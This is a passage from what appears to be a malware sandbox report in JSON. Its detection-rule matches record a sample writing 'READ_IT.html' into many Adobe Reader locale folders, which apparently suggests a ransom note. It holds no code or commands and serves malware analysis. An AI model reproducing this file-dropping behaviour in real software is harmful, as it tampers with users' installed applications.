[ { "ref_id": "gfn_13238", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_tw\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_tw\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_13336", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_tw\\services\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_13346", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_13444", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\services\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_13454", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_13552", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\services\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_13562", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_13660", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\services\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_13670", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_13768", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\services\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sl_si\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_13778", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sl_si\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sl_si\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_13876", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sl_si\\services\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_13886", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_13984", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\services\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ru_ru\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_13994", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ru_ru\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ru_ru\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_14092", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ru_ru\\services\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_14102", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_14200", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\services\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pt_br\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_14210", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pt_br\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pt_br\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_14308", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pt_br\\services\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pl_pl\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_14318", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pl_pl\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pl_pl\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_14416", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pl_pl\\services\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_14426", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_14524", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\services\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nb_no\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_14534", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nb_no\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nb_no\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_14632", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nb_no\\services\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ko_kr\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_14642", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ko_kr\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ko_kr\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_14740", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ko_kr\\services\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_14750", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_14848", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\services\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\it_it\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_14858", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\it_it\\read_it.html\".", 